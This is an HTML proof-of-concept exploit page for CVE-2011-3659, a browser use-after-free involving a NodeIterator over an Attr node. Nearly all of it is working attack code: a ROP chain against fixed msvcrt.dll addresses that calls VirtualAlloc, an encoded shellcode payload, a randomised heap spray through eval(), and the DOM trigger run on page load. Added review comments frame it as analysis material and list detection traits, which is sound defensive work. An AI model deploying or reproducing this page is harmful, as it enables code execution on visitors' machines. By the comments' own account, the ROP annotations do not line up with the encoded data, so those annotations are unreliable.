CVE_2011_3659.html
<html>
<head>
<meta http-equiv="refresh" content="3">
<body>
<script language='javascript'>
// NOTE(review): proof-of-concept exploit page for CVE-2011-3659, kept byte-identical for analysis.
// The comments added here describe only what the visible code does and which traits a
// content-inspection, sandbox or EDR detection rule can key on; they are not a guide to the bug.
//
// rop: a string of %uXXXX escapes decoded by unescape(), i.e. consecutive little-endian 32-bit
// values laid out back to back. The original annotations below give one absolute msvcrt.dll
// address per entry, so the data presupposes that module at a single fixed load address.
// The annotations do not line up one-to-one with the encoded words (the first annotated value
// is not the first encoded pair), so treat them as approximate rather than authoritative.
// Detection angle: long runs of "%u"-escaped 16-bit words passed to unescape() outside any URL context.
var rop = unescape("%uf50b%u7818"+
"%ue392%u77c1"+
"%u111d%u77be"+
"%uba0f%u77c0"+
"%uba0f%u77c0"+
"%u7705%u77c1"+
"%u0001%u0000"+
"%ucbf9%u77c1"+
"%u1000%u0000"+
"%u0b00%u77c1"+
"%u0040%u0000"+
"%u6100%u77c1"+
"%u6101%u77c1"+
"%ua18d%u77c0"+
"%uaacc%u77bf"+
"%u67f0%u77c2"+
"%u1025%u77c2");
// 0x77c0a891, # XCHG EAX,ESP # POP EBP # POP EBX # RETN [msvcrt.dll] stack flip
// 0x77c1e392, # POP EAX # RETN [msvcrt.dll]
// 0x77be111d, # ptr to &VirtualAlloc() (77be110c - EF on al = 77be111d)[IAT msvcrt.dll]
// 0x77c0ba0f, # POP EBP # RETN [msvcrt.dll]
// 0x77c0ba0f, # skip 4 bytes [msvcrt.dll]
// 0x77c17705, # POP EBX # RETN [msvcrt.dll]
// 0x00000001, # 0x00000001-> ebx
// 0x77c1cbf9, # POP EDX # RETN [msvcrt.dll]
// 0x00001000, # 0x00001000-> edx
// 0x77c10b00, # POP ECX # RETN [msvcrt.dll]
// 0x00000040, # 0x00000040-> ecx
// 0x77c16100, # POP EDI # RETN [msvcrt.dll]
// 0x77c16101, # RETN (ROP NOP) [msvcrt.dll]
// 0x77c0a18d, # POP ESI # RETN [msvcrt.dll]
// 0x77bfaacc, # JMP [EAX] [msvcrt.dll]
// 0x77c267f0, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
// 0x77c21025, # ptr to 'push esp # ret ' [msvcrt.dll]
// payload: a second %u-encoded blob (shellcode). Its contents are opaque from this page and are
// deliberately not decoded or described here; the spray below places it directly after rop.
var payload = unescape("%uc481%ufa24%uffff%uc7ba%u1c16%udadd%ud9cc%u2474"+
"%u58f4%uc92b%u33b1%ue883%u31fc%u0e50%u9703%ufe18"+
"%ueb28%u77cd%u13d2%ue80e%uf65a%u3a3f%u7338%u8a6d"+
"%ud14a%u619e%uc11e%u0715%ue6b7%ua29e%uc9e1%u031f"+
"%u852e%u05dc%ud7d2%ue630%u18eb%ue745%u442c%ub5a6"+
"%u03e5%u2a15%u5181%u4ba6%ude45%u3396%u20e0%u8e62"+
"%u70eb%u85db%u68a4%uc157%u8914%u11b4%uc068%ue2b1"+
"%ud31a%u3b13%ue2e2%u905b%ucbdd%ue851%ueb1a%u9f89"+
"%u0850%u9837%u73a2%u2de3%ud337%u9560%ue293%u40a5"+
"%ue857%u0602%uec3f%ucb95%u084b%uea1d%u999b%uc965"+
"%uc23f%u703e%uae19%u8d91%u1679%u284d%ub4f1%u4a9a"+
"%ud258%ude5d%u9be6%ue05e%u8be8%ud136%u4463%uee40"+
"%u21a1%ua4be%u03e8%u6157%u1679%u923a%u5457%u1143"+
"%u2452%u09b0%u2117%u8dfc%u5bcb%u786d%uc8ec%ua98e"+
"%u8f8f%u311c%u2a7e%ud0a5%u417e");
// Heap spray. Each of the 0x320 (800) iterations builds one string of (262144-6)/2 UTF-16 code
// units laid out as: offset_length code units of random padding, then rop, then payload, then
// padding up to 0x800 code units, that 0x800-unit pattern repeated by string doubling. The string
// is then bound to a freshly named global by eval() of a generated "var <name>= '<data>';" text.
// Detection angles, all visible in the source: eval() of a runtime-built declaration inside a
// loop; Math.random()-derived %u padding passed to unescape(); doubling loops that grow a string
// to 0x1000 and then 262144 code units; hundreds of large, randomly named string globals.
// Note: junk_offset, sprayblock, varname and thisvar are assigned without var and so become
// implicit globals.
var offset_length = 1542;
for (var i=0; i < 0x320; i++)
{
// four two-digit numbers (10..99); digits are valid hex, so "%u" + two of them is a %uXXXX escape
var random1=Math.floor(Math.random()*90)+10;
var random2=Math.floor(Math.random()*90)+10;
var random3=Math.floor(Math.random()*90)+10;
var random4=Math.floor(Math.random()*90)+10;
var paddingstr = "%u" + random1.toString() + random2.toString();
paddingstr += "%u" + random3.toString() + random4.toString();
var padding = unescape(paddingstr);
// grow the 2-unit padding to at least 0x1000 code units by doubling
while (padding.length < 0x1000) padding+= padding;
junk_offset = padding.substring(0, offset_length);
var single_sprayblock = junk_offset + rop + payload;
// pad the block out to exactly 0x800 code units
single_sprayblock += padding.substring(0,0x800 - offset_length - rop.length - payload.length);
while (single_sprayblock.length < 262144) single_sprayblock += single_sprayblock;
sprayblock = single_sprayblock.substring(0, (262144-6)/2);
// variable name built from the same random numbers plus the loop index, then declared via eval()
varname = "var" + random1.toString() + random2.toString();
varname += random3.toString() + random4.toString() + i.toString();
thisvar = "var " + varname + "= '" + sprayblock +"';";
eval(thisvar);
}
// run(): page entry point (invoked from the body onload attribute). Performs a fixed sequence of
// DOM operations on an Attr node and a NodeIterator created over it, then a second spray, then
// reads ni.referenceNode. The CVE-specific trigger is not explained here; only the observable
// steps are annotated.
function run() {
// Attr node with an explicit value, then a NodeIterator rooted at it whose filter accepts every node.
var attr = document.createAttribute("foo");
attr.value = "bar";
var ni = document.createNodeIterator(
attr, NodeFilter.SHOW_ALL,
{acceptNode: function(node) { return NodeFilter.FILTER_ACCEPT; }},
false);
// Two forward steps, one back, then the attribute value is replaced with null.
ni.nextNode();
ni.nextNode();
ni.previousNode();
attr.value = null;
// Second spray: 'small' starts at 8 UTF-16 code units and is grown to exactly 30 by appending the
// 2-unit addr filler (8 + 11*2 == 30, so the != test terminates here; it would spin forever if
// the lengths did not line up), then 2*1024*1024 copies are pushed into one array.
// Style: 'const' on a single line in an otherwise var-only script; 'i' here is the global loop
// variable left over from the spray loop above, reused without declaration.
// Detection angle: ~2M pushes of identical unescape() output into a single array.
const addr = unescape("%u5a48%u4344");//filler junk
var container = new Array();
var small = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u278e%u77c2%u0c10%u0c0c"); //0x77c2278e # POP ESP # RETN [msvcrt.dll]
while (small.length != 30)
small += addr;
for (i = 0; i < 1024*1024*2; ++i)
container.push(unescape(small));
// Final read of the iterator's reference node after the attribute mutation above; the value is discarded.
ni.referenceNode;
}
</script>
</head>
<body onload="run();">
</svg>
</body>
</html>